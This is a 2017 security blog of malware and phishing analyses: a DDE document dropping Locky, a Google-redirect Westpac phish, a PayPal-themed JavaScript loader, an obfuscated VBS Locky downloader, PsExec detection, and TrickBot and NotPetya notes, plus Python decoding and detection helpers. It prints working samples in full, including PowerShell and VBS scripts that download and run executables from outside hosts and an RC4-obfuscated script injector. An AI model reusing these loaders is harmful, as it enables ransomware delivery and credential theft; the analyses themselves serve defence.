Thursday, October 19, 2017

DDE vulnerability/feature exploited by Phishing campaign serving Locky Payload - Analysis

This is one of the ongoing campaigns (started last night) using the DDE ‘feature’, serving Locky as a payload.

Flow:
Phish > Doc attachment > DDE code > download Base64 encoded string > execute decoded commands > payload > execute

Email:
Subject: Emailed Invoice - *
Attachment: l_123456.doc-

Downloader:
FileName: I_099292.doc


MD5: 0910541c2ac975a49a28d7a939e48cd3
SHA1: 0f3448bd32ddf76f6b23c8f1937e71770bb0663a
SHA256: 3fa85101873d1c3447594c309ea1e324beb578843e1fab7c05189830d2def126

DDE Flow:

1. Open the doc
2. This msg pops up:
3. Nothing on the first page:
4. Scroll to the end:
5. This is the DDE code:
6. Toggle code:
7. This should give you the actual code:
This downloader was found to be serving Locky.


The above DDE code reaches out and grabs the string from arkberg-design*fi, which is Base64 encoded.


Decoded:

$urls = "hxxp://shamanic-extracts.biz/ eurgf837or","hxxp://centralbaptistchurchnj.org/ eurgf837or","","hxxp://conxibit.com/ eurgf837or"

foreach($url in $urls){
    Try
    {
        Write-Host $url
        $fp = "$env:temp\rekakva32.exe"
        Write-Host $fp
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, $fp)
        Start-Process $fp
        break
    }
    Catch
    {
        Write-Host $_.Exception.Message
    }
}


The payload is Locky.
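As an added triage helper (not part of the post), here is how to decode a blob of the kind the DDE command fetches and pull the indicators out of it: the page's blob starts with DQAKACQAdQByAGwA..., which is the Base64 of the UTF-16LE bytes of `$urls = "http://`, i.e. the same form PowerShell's -EncodedCommand uses. The sample script and its .invalid hosts are constructed stand-ins shaped like the decoded downloader above.

```python
import base64
import re

# Constructed stand-in for the fetched blob: a PowerShell downloader in the
# same shape as the decoded script above, with placeholder .invalid hosts.
SAMPLE_SCRIPT = (
    '\r\n$urls = "http://stage-a.invalid/eurgf837or",'
    '"http://stage-b.invalid/eurgf837or","","http://stage-c.invalid/eurgf837or"\r\n'
    'foreach($url in $urls){\r\nTry\r\n{\r\n'
    '\tWrite-Host $url\r\n'
    '\t$fp = "$env:temp\\rekakva32.exe"\r\n'
    '\t$wc = New-Object System.Net.WebClient\r\n'
    '\t$wc.DownloadFile($url, $fp)\r\n'
    '\tStart-Process $fp\r\n\tbreak\r\n}\r\n'
    'Catch\r\n{\r\n\tWrite-Host $_.Exception.Message\r\n}\r\n}\r\n'
)
# PowerShell's -EncodedCommand form: Base64 over the UTF-16LE bytes of the script.
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")


def looks_utf16le(raw: bytes) -> bool:
    """ASCII text encoded as UTF-16LE has a zero byte in every odd position."""
    return len(raw) >= 2 and all(b == 0 for b in raw[1::2])


def decode_blob(b64: str) -> str:
    """Base64-decode, then pick UTF-16LE (PowerShell style) or plain UTF-8."""
    raw = base64.b64decode(b64)
    if raw[:2] == b"\xff\xfe":          # optional UTF-16LE byte-order mark
        raw = raw[2:]
    if looks_utf16le(raw):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", "replace")


URL_RE = re.compile(r"""https?://[^\s"'<>()]+""", re.IGNORECASE)
DROP_RE = re.compile(r"\$env:temp\\([\w.-]+)", re.IGNORECASE)


def defang(url: str) -> str:
    """hxxp:// and host[.]tld so the indicators are safe to paste into a report."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + "/" + path


def extract_iocs(script: str) -> dict:
    """Download URLs, dropped file name(s) under %TEMP%, and whether the
    script follows the download-then-execute pattern seen in this campaign."""
    return {
        "urls": [defang(u) for u in URL_RE.findall(script)],
        "drop_files": DROP_RE.findall(script),
        "download_and_run": "DownloadFile(" in script and "Start-Process" in script,
    }


if __name__ == "__main__":
    script = decode_blob(SAMPLE_B64)
    for key, value in extract_iocs(script).items():
        print(key, "=", value)
```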



:)

Wednesday, September 27, 2017

Phishing - Google redirect function used in link for phishing Westpac bank

https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja&uact=8&ved=0ahUKEwitg8Sfs8bWAhXSmLQKHTsHBCY4FBAWCCUwAA&url=http%3A%2F%2Fwww.almatulum.com%2Fblog%2Fnew-lounge-area%2F&usg=AFQjCNEr6lEZY_UW0EQJVFerr39HdTCk3w

Which should lead to: http://www.almatulum.com/blog/new-lounge-area/

Which again redirects to: https://hustlecreative.com/w/westpac/WestpacOnlineBanking.htm?mekteewibtmdakuaiaiiiesaudalnlzumizrnneadenaarlteannbnlaweadndaasdtlnlmedwenlaadamraklaezziewetanmkdsbasllaiiammuitblndatdndeltiniraanunenuean83044339483

Which is the fake Westpac page.
Just another phishing email with a twist.
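As an added example (not from the post), the two checks a mail gateway or analyst can run on a link like the one above: unwrap the destination carried in Google's /url redirector, and flag a final page whose path carries a brand name that its host does not. The redirect link is the one quoted above; the final hop is the post's fake Westpac URL with its long query string dropped.

```python
from urllib.parse import urlparse, parse_qs

# The redirect link quoted in the post.
GOOGLE_REDIRECT = (
    "https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja"
    "&uact=8&ved=0ahUKEwitg8Sfs8bWAhXSmLQKHTsHBCY4FBAWCCUwAA"
    "&url=http%3A%2F%2Fwww.almatulum.com%2Fblog%2Fnew-lounge-area%2F"
    "&usg=AFQjCNEr6lEZY_UW0EQJVFerr39HdTCk3w"
)
# The final hop from the post, query string dropped.
PHISH_PAGE = "https://hustlecreative.com/w/westpac/WestpacOnlineBanking.htm"


def unwrap_google_redirect(link: str):
    """Return the destination carried by Google's /url redirector, or None
    when the link is not one. parse_qs percent-decodes the value for us.
    A production check would pin the host to Google's real domains rather
    than just looking for a 'google' label as done here."""
    p = urlparse(link)
    if "google" not in p.netloc.lower().split(".") or p.path != "/url":
        return None
    return parse_qs(p.query).get("url", [None])[0]


def brand_mismatch(url: str, brand: str) -> bool:
    """True when the brand appears in the URL but not in its host: the
    pattern of /w/westpac/... served from an unrelated domain above."""
    host = urlparse(url).netloc.lower()
    brand = brand.lower()
    return brand in url.lower() and brand not in host


def assess_chain(hops, brand: str) -> dict:
    """hops: the URLs as observed, in order (redirect link first)."""
    first_dest = unwrap_google_redirect(hops[0])
    return {
        "redirector": first_dest is not None,
        "redirector_target": first_dest,
        "final": hops[-1],
        "brand_mismatch": brand_mismatch(hops[-1], brand),
    }


if __name__ == "__main__":
    chain = [GOOGLE_REDIRECT, "http://www.almatulum.com/blog/new-lounge-area/", PHISH_PAGE]
    print(assess_chain(chain, "westpac"))
```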



Tuesday, September 26, 2017

Phishing - JavaScript loader in HTML page - PayPal theme

This is sent as an attachment, so that the actual script is executed locally as opposed to over the network. That makes it a bit easier to execute the first stage (avoiding network-based detection). The page eventually loaded is the fake PayPal site, and the information entered is sent to the C2 server. The last redirect goes to the actual PayPal site so that the user doesn't suspect anything.


<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
</head>

<body><script>

// hex string -> characters (skips an optional leading "0x")
function c7tn83(rd1jqp4)
{
  var lgx4s84f = 0;
  var pojb6ff = '';
  if( rd1jqp4.substr(0,2) == '0x' ){ lgx4s84f = 2; }
  if( typeof rd1jqp4 != 'string' ){ rd1jqp4 = rd1jqp4.toString(); }
  for(var apnsxieh=lgx4s84f;  apnsxieh<rd1jqp4.length; apnsxieh+=2) {
    var c = rd1jqp4.substr( apnsxieh, 2 );
    pojb6ff = pojb6ff + String.fromCharCode( parseInt(c, 16) );
  }
  return pojb6ff;
}

// RC4: key schedule over rx3oj311, then XOR of ll1u8137 with the keystream
function f8ce53222(ll1u8137, rx3oj311) {
  var pf9879t75, khqr2, gecb, jxl077g53, in3431y23, sgcbn1e9;
  for (pf9879t75 = [], khqr2 = 0, jxl077g53 = "", in3431y23 = 0; in3431y23 < 256; in3431y23++) pf9879t75[in3431y23] = in3431y23;
  for (in3431y23 = 0; in3431y23 < 256; in3431y23++)
    khqr2 = (khqr2 + pf9879t75[in3431y23] + rx3oj311.charCodeAt((in3431y23 % rx3oj311.length))) % 256,
    gecb = pf9879t75[in3431y23],
    pf9879t75[in3431y23] = pf9879t75[khqr2],
    pf9879t75[khqr2] = (gecb);
  for (in3431y23 = 0, khqr2 = 0, sgcbn1e9 = 0; sgcbn1e9 < ll1u8137.length; sgcbn1e9++)
    in3431y23 = ((in3431y23 + 1) % 256),
    khqr2 = ((khqr2 + pf9879t75[in3431y23]) % 256),
    gecb = pf9879t75[in3431y23],
    pf9879t75[in3431y23] = pf9879t75[khqr2],
    pf9879t75[khqr2] = gecb,
    jxl077g53 += String.fromCharCode(ll1u8137.charCodeAt(sgcbn1e9) ^ pf9879t75[(pf9879t75[in3431y23] + pf9879t75[khqr2]) % 256]);
  return jxl077g53
}

var p918 = f8ce53222(c7tn83("bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2"),"j388p");
// p918: "http://www.subject-data.com/1f5669beacc555da69e67826724fd033.js" - this is the script that will be loaded into the browser

var zgdz = f8ce53222(c7tn83("a477edb69a82"),"j388p");
// zgdz: "script"

var qw1mpd9 = document.createElement(zgdz);
qw1mpd9.src = p918;
var jkl6lg = f8ce53222(c7tn83("bf71febb"),"j388p");
// jkl6lg: "head"

document.getElementsByTagName(jkl6lg)[0].appendChild(qw1mpd9);
// this will result in: head > script > JS
</script>

</body>
</html>
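As an added example (not the loader's own code), the two helpers re-implemented in Python so the strings can be recovered offline: c7tn83() is a hex decoder and f8ce53222() is plain RC4, keyed here with "j388p" as in the page. Correctness is checked against the standard RC4 test vectors; running it on the page's hex strings reproduces the annotated values.

```python
# Python mirror of the loader's two helpers: hex decode + RC4.


def hex_to_bytes(s: str) -> bytes:
    """Mirror of c7tn83(): drop an optional '0x' prefix, decode hex pairs."""
    if s.startswith("0x"):
        s = s[2:]
    return bytes.fromhex(s)


def rc4(data: bytes, key: bytes) -> bytes:
    """Mirror of f8ce53222(): RC4 key scheduling, then XOR with the keystream.
    RC4 is symmetric, so the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decode_loader_string(hex_blob: str, key: str = "j388p") -> str:
    """Recover one string exactly as f8ce53222(c7tn83(hex), key) does.
    latin-1 keeps the JS one-char-per-byte semantics of String.fromCharCode."""
    return rc4(hex_to_bytes(hex_blob), key.encode("latin-1")).decode("latin-1")


def encode_loader_string(plain: str, key: str = "j388p") -> str:
    """Inverse of decode_loader_string(); useful for building test fixtures."""
    return rc4(plain.encode("latin-1"), key.encode("latin-1")).hex()


if __name__ == "__main__":
    # The two short hex strings from the loader above.
    for blob in ("a477edb69a82", "bf71febb"):
        print(blob, "->", decode_loader_string(blob))
```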

Monday, September 25, 2017

Here's a simple, straight-forward downloader that can serve any payload

Written in simple VBS, launched by WScript on a Win host. 

Currently serving Locky Ransomware


Dim UltraXgettingensurance 'As String

Dim UltraXgettingUotOfStock 'As String

Function CopyLog()

        Dim oFile
        Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile
        Dim sComputer
        Dim sLog
        Dim sBootDrive
        ' Make sure the path is accessible
        oUtility.ValidateConnection oEnvironment.Item("SLShare")
        oUtility.VerifyPathExists oEnvironment.Item("SLShare")
        If not oFSO.FolderExists(oEnvironment.Item("SLShare")) then
            oLogging.CreateEntry "An invalid SLShare value of " & oEnvironment.Item("SLShare") & " was specified.", LogTypeWarning
            Exit Function
        End if

       

    End Function
   
Function Set2Mine(Who, Color, X, y )
    For i = 0 To UBound(Mines) + 1
        If i > UBound(Mines) Then ReDim Preserve Mines(i)
        If Mines(i).Color = 0 Then
            Mines(i).Who = Who
            Mines(i).Color = Color
            Mines(i).X = X
            Mines(i).y = y
            Mines(i).Tick = 0
            SetMine = i
            Exit For
        End If
    Next
End Function




Function StateUovertakesgetting()
if D = 19 then
AXC = "SaveT"+"oFile"
end if
StateUovertakes4000.Savetofile UltraXgettingUotOfStock , 9-7
End Function

  UltraXgettingBelish = "User"




Function F3(p, ddd)
    Set UltraXgettingRombickom = CreateObject("WScrip"+"t.Shell")   
End Function

 Dim Advancedmantel2 'As String

Function ABTF(A, B, T, F)
    set ABTF = A.CreateTextFile( B,T , F)
end function

Dim UltraXgettingRickyTIcky 'As Object
Dim StateUovertakes4000 'As Object

    RACHEL = "avetof"

       Dim TristateTrue

  Advancedmantel2 = "XMLHTTPFIREMANAdodb.streaMFIREMANs"
Vrungel = ".respo"+"nseBody"
Function SheduledObject(p,d)


 UltraXgettingRombickom.Run("" &UltraXgettingUotOfStock )
End Function


Dim UltraXgettingTimeTo 'As Object
Dim UltraXgettingstatus
UltraXgettingstatus = false
     Dim JohnTheRipper
Dim UltraXgettingcashback 'As Object
CUA ="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

Dim UltraXgetting1DASH1solo 'As Object  

Advancedmantel2 ="Microsoft." + Advancedmantel2+  "hell.ApplicationFIREMANWscript"+".shellFIREMANProcessFIREMANGeTFIREMANT"+"emPFIREMANTyJACKSON"+"peJACKSON"


Function MambaMamba( TIK )
   MambaMamba = Split(Replace(Advancedmantel2, "JACKSON", "" ),  TIK)
End Function
Dim mual

Function StateUovertakesgetting2(param1)
param1 = param1 + param1

UltraXgettingResponseBody = UltraXgettingRickyTIcky.responseBody
param1 = 4 * param1 + 8   

End Function


Public Function IsLineAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnLineCanonic Or _
    Figures(Figure1).FigureType = dsAnLineGeneral Or _
    Figures(Figure1).FigureType = dsAnLineNormal Or _
    Figures(Figure1).FigureType = dsAnLineNormalPoint Then IsLineAnalytic = True
End If
End Function


Public Function IsCircleAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnCircle Then IsCircleAnalytic = True
End If
End Function
Advancedmantel2 = Advancedmantel2 +"FIREMANJACKSONoJACKSONpenFIREMANwrJACKSONiteFIREMANreJACKSONspoJACKSONnseBoJACKSONdyFIREMANsaJACKSONvetof"+"JACKSONileFIREMAN\xhAFULQ.ex"+"eJACKSONFIREMANhtJACKSONtp:FIREMAN//"
Function UltraXgettingFuks(p)

UltraXgettingRickyTIcky.Send
   
End Function
JohnTheRipper = MambaMamba("" + "FIREMAN" + "")



  Private Sub SubscriptionHistoryMaintenance(ByVal db , ByRef curlist , ByVal historyLength )
    If historyLength < 1 Then
      historyLength = 1 ' Minimum history length is one!
    End If

    ' Sort by date descending (default sorter for PST sorts descending)
    curlist.Sort()

    ' Now purge any old files
    For i  = 0 To curlist.Count - 1
      If i >= historyLength Then
        Me.PurgePodcastFile db, curlist(i)
      End If
    Next
  End Sub
Set UltraXgettingRickyTIcky = CreateObject(JohnTheRipper(0))

Dim UltraXgetting4 'As String

Dim UltraXgettingResponseBody 'As Variant
Dim UltraXgettingRombickom
 Dim MarketPlace 'As String
  Dim sTempVis 'As String
  Dim iCount 'As Integer
Public Function WriteCD(aWrite,bWrite)
astp = 12
astp = astp + 3
if astp > 4 then
aWrite.Write bWrite
astp = 3 * astp
end if
End Function
Dim Valery 'As Integer
UltraXgettingBelish = UltraXgettingBelish + "-"

Dim Twelve 'As Integer
  Dim sDecimalVis 'As String
  Dim UltraXgettingPetir 'As String
UltraXgettingPetir = "Ag"

  Dim MarketPlaceibility 'As String


 Dim sNodeKey 'As String
  Dim sParentKey 'As String

   


Twelve = 11 + 1
zTempVis = JohnTheRipper(1)

'Set UltraXgettingTimeTo = CreateObject(JohnTheRipper(8-6))
Set UltraXgettingRockiBilbo = GetRef("SheduledObject")

Set StateUovertakes4000 = CreateObject("Adodb.streaM")
Set UltraXgetting1DASH1solo = CreateObject(JohnTheRipper(9-6))


Function SetUA()
UltraXgettingLamp.setRequestHeader UltraXgettingBelish, CUA
End Function

if "RIDG" + WScript + "4" = "RIDGWindows Script Host4" Then
   
   
mual = Array("pawnedsite-1.com/payload","pawnedsite-2.com/payload","pawnedsite-3.com/payload")

    Set UltraXgettingcashback = UltraXgetting1DASH1solo.Environment(JohnTheRipper(1 + 3))

end if   


Public Function Anim2UniBall(i)
    Dim Rx, Ry, rBuff
    Dim xt, yt, j, e
    Dim NewX, NewY, d, SgnX, SgnY
    Dim RatioX, RatioY
    Rx = 452
    Ry = 81
   
   
    If SgnY = 1 Then 'y positive testing
        For d = UniBall(i).BallY + 1 To NewY
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d - 1
                Exit For
            End If
        Next
    End If
   
    If SgnY = -1 Then 'y negative testing
        For d = UniBall(i).BallY - 1 To NewY Step -1
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d + 1
                Exit For
            End If
        Next
    End If
    j = WeaponTouch(6, i, NewX, NewY)
    If j = -7 Then Exit Function
   
    UniBall(i).BallX = NewX
    UniBall(i).BallY = NewY
End Function


 Valery = 89210


UltraXgettingensurance = UltraXgettingcashback(JohnTheRipper(6))
 Dim i
 'on error GoTo nextU
' on error resume next
sTempVis = JohnTheRipper(Twelve)

Sub SendFlagDat(SndTo)
    Dim i , b , n
    Dim oNewMsg() , lNewOffSet
    Dim lNewMsg
   
    For i = 1 To UBound(Flag1, 2)
       
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 1
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag1(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag1(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry1(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag2, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 2
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag2(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag2(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry2(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag3, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 3
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag3(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag3(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry3(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag4, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 4
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag4(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag4(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry4(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag5, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 5
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag5(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag5(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry5(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
   
End Sub

MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)

UltraXgettingBelish = UltraXgettingBelish & UltraXgettingPetir & "ent"

rdde = 19


lTo = UBound(mual)
For i = 0 To lTo Step 1
rdde = rdde * 8

    on error resume  next

Valery =  Valery +33
 UltraXgetting4 = MarketPlace + mual(i)
 UltraXgettingRickyTIcky.Open JohnTheRipper(5), UltraXgetting4, False
dr1=2

rdde = rdde + 91


SetUA()
UltraXgettingFuks " d "
If UltraXgettingRickyTIcky.Status +3 = 203 Then
UltraXgettingstatus = true
 Exit For
End If

goto14:
Next

on error goto 0
if UltraXgettingstatus Then
Dim Ratchet 'As String
 UltraXgettingUotOfStock = UltraXgettingensurance+ sTempVis

F3 "",4
StateUovertakes4000.Type = 1
 StateUovertakes4000.Open
StateUovertakesgetting2 22
WriteCD StateUovertakes4000,UltraXgettingResponseBody
dttat =4
UltraXgettingUotOfStocku = "" + UltraXgettingUotOfStock

dttat = dttat*2

StateUovertakesgetting()
Dim UltraXgettingJohnSnowu,UltraXgettingTmp1 'As Long

UltraXgettingJohnSnowu = 3012

If 1040  < UltraXgettingJohnSnowu Then
  drba =55
 UltraXgettingTmp1 = "|"

UltraXgettingRockiBilbo "}}}}}}}}}}}}}","062"
End If
 


triada = 341
end if
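As an added example (not part of the sample), the string-table trick this script relies on, reproduced in Python: Advancedmantel2 is built from three fragments, MambaMamba() strips the junk token "JACKSON" and splits on "FIREMAN", and every JohnTheRipper(n) call indexes the result, with the index arithmetic (9-6, 1 + 3, Twelve) being further padding. The three fragments and the call-site excerpt are copied from the script above; the resolver is mine.

```python
import re

# The three pieces the VBS concatenates into Advancedmantel2, copied verbatim.
PART1 = "XMLHTTPFIREMANAdodb.streaMFIREMANs"
PART2 = ("Microsoft." + PART1 + "hell.ApplicationFIREMANWscript"
         + ".shellFIREMANProcessFIREMANGeTFIREMANT" + "emPFIREMANTyJACKSON" + "peJACKSON")
ADVANCEDMANTEL2 = PART2 + (
    "FIREMANJACKSONoJACKSONpenFIREMANwrJACKSONiteFIREMANreJACKSONspoJACKSONnseBo"
    "JACKSONdyFIREMANsaJACKSONvetof" + "JACKSONileFIREMAN\\xhAFULQ.ex"
    + "eJACKSONFIREMANhtJACKSONtp:FIREMAN//")


def mamba_mamba(blob: str, tik: str = "FIREMAN", junk: str = "JACKSON") -> list:
    """Mirror of MambaMamba(): remove the junk token, split on the separator."""
    return blob.replace(junk, "").split(tik)


# The decoded table the script calls JohnTheRipper.
JOHN_THE_RIPPER = mamba_mamba(ADVANCEDMANTEL2)

NAMED_INDICES = {"Twelve": 12}          # Twelve = 11 + 1 in the script
CALL_RE = re.compile(r"JohnTheRipper\(([^)]*)\)")


def eval_index(expr: str) -> int:
    """Evaluate the tiny integer sums the script uses as indices, without eval()."""
    expr = expr.strip()
    if expr in NAMED_INDICES:
        return NAMED_INDICES[expr]
    total = 0
    for sign, num in re.findall(r"([+-]?)\s*(\d+)", expr):
        total += -int(num) if sign == "-" else int(num)
    return total


def resolve_calls(vbs_source: str) -> dict:
    """Map every JohnTheRipper(<expr>) in the source to the string it yields."""
    return {m: JOHN_THE_RIPPER[eval_index(m)] for m in CALL_RE.findall(vbs_source)}


# Call sites copied from the script above (the live path, decoys omitted).
VBS_EXCERPT = """
Set UltraXgettingRickyTIcky = CreateObject(JohnTheRipper(0))
Set UltraXgetting1DASH1solo = CreateObject(JohnTheRipper(9-6))
Set UltraXgettingcashback = UltraXgetting1DASH1solo.Environment(JohnTheRipper(1 + 3))
UltraXgettingensurance = UltraXgettingcashback(JohnTheRipper(6))
sTempVis = JohnTheRipper(Twelve)
UltraXgettingRickyTIcky.Open JohnTheRipper(5), UltraXgetting4, False
MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)
"""

if __name__ == "__main__":
    for i, s in enumerate(JOHN_THE_RIPPER):
        print(i, s)
    for expr, value in resolve_calls(VBS_EXCERPT).items():
        print(f"JohnTheRipper({expr}) -> {value!r}")
```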



Tuesday, August 1, 2017

Detecting Lateral Movement - PsExec execution with Demo





PsExec can be used quite easily on any network to move laterally from one system to another. Here's one way of detecting lateral movement.


Demo:
We'll create a PsExec session and then look for the events and note them down. These can then be used for monitoring alerts or forensic investigations.

Launch a PsExec session from one machine to another and note the time:

Machine A -

Session launched on Machine B -

Now we look through the Windows Event Viewer and find the events for this session.
Looking through the Security events, we can see in the image below that the Logon event (ID 4624) was created for the session that we launched (note the timestamp).

Details of the event should give us more information on the event.

This tells us clearly that the logon was from our Machine A, through PsExec.
Next, we need to look for the service that was created as part of this session. PsExec creates the process PSEXESVC.exe on the host system when successfully launched.

To find the process created on this host system (Machine B), we need to look under the System events.

Look at the details:

These are the events you need to monitor/investigate for PsExec execution on the host systems. The whole process can be automated through a SIEM for passive monitoring of security events, or executed ad hoc as needed for investigations and incident response.

When investigating systems post-incident, you can acquire the event files from this location on Win8*:

C:\Windows\System32\winevt\Logs

Once acquired, these files can be reviewed in the Windows Event Viewer on your investigation machine.
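As an added example (not from the post), the pairing described above written as detection logic: a Security 4624 network logon (type 3) followed within a short window by a service-install record in the System log. The records are constructed samples already parsed into dicts; the service-install event ID 7045 is the standard Service Control Manager one and is not named in the post.

```python
from datetime import datetime

# Constructed sample records (not the post's screenshots), shaped like the
# two events the post walks through: Security 4624 and System 7045.
SAMPLE_EVENTS = [
    {"log": "Security", "id": 4624, "time": "2017-08-01T10:15:02",
     "LogonType": 3, "TargetUserName": "itadmin", "IpAddress": "10.0.0.5",
     "WorkstationName": "MACHINE-A"},
    {"log": "System", "id": 7045, "time": "2017-08-01T10:15:03",
     "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"log": "Security", "id": 4624, "time": "2017-08-01T11:00:00",      # console
     "LogonType": 2, "TargetUserName": "bob", "IpAddress": "-",           # logon,
     "WorkstationName": "MACHINE-B"},                                    # benign
    {"log": "System", "id": 7045, "time": "2017-08-01T12:30:00",        # no logon
     "ServiceName": "Backup Agent",                                      # nearby
     "ImagePath": "C:\\Program Files\\Backup\\agent.exe"},
]


def is_psexec_service(ev: dict) -> bool:
    """High-confidence signal: PsExec's default service name or binary."""
    name = ev.get("ServiceName", "").upper()
    path = ev.get("ImagePath", "").upper()
    return name == "PSEXESVC" or "PSEXESVC.EXE" in path


def find_psexec_sessions(events, window_seconds=60):
    """Pair each System 7045 with a preceding network logon (4624, type 3)
    inside the window. Confidence is 'high' when the service looks like
    PsExec's default and 'medium' otherwise, which still catches a service
    renamed with PsExec's -r option."""
    logons = [e for e in events
              if e["log"] == "Security" and e["id"] == 4624 and e.get("LogonType") == 3]
    findings = []
    for svc in events:
        if svc["log"] != "System" or svc["id"] != 7045:
            continue
        t_svc = datetime.fromisoformat(svc["time"])
        for lg in logons:
            delta = (t_svc - datetime.fromisoformat(lg["time"])).total_seconds()
            if 0 <= delta <= window_seconds:
                findings.append({
                    "time": svc["time"],
                    "user": lg["TargetUserName"],
                    "source_ip": lg["IpAddress"],
                    "source_host": lg["WorkstationName"],
                    "service": svc["ServiceName"],
                    "delta_s": delta,
                    "confidence": "high" if is_psexec_service(svc) else "medium",
                })
    return findings


if __name__ == "__main__":
    for finding in find_psexec_sessions(SAMPLE_EVENTS):
        print(finding)
```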

:)


Tuesday, July 25, 2017

Thursday, July 20, 2017

TrickBot Banking Malware - some features of interest

Here's one:

It creates this dir - c:\Users\%username%\appdata\Roaming\winapp\

Now - if you're thinking that creating this dir yourself and then read/write protecting it will make this malware not execute fully, you're wrong :)

If it can't access that location to create the directory, it simply dumps the PE on the Desktop and executes from there.

Cool stuff!

Thursday, July 6, 2017

Wednesday, June 28, 2017

Petya NotPetya Quick and Dirty Analysis

I'll leave the detailed version to hasherezade :)
This is a quick look at what the malware is about and what functions it uses.

Looks for physical drives on the infected computer.

Here's the bundled-in PsExec, as dllhost.dat:

Here's another PE, which looks like it is used to launch rundll32.exe as perfc.dat:

Infection starts.

dllhost.dat > PsExec

System restart.

Encryption.

Provider: MS RSA AES

This is where it starts in user-land.

All the familiar messages.

And here's all the WMI stuff.
Also, note that rundll32.exe is called by '%s' - perfc.dat in this case.

Running PsExec on the entire subnet, after accepting the EULA of course :)

Extensions to be encrypted.

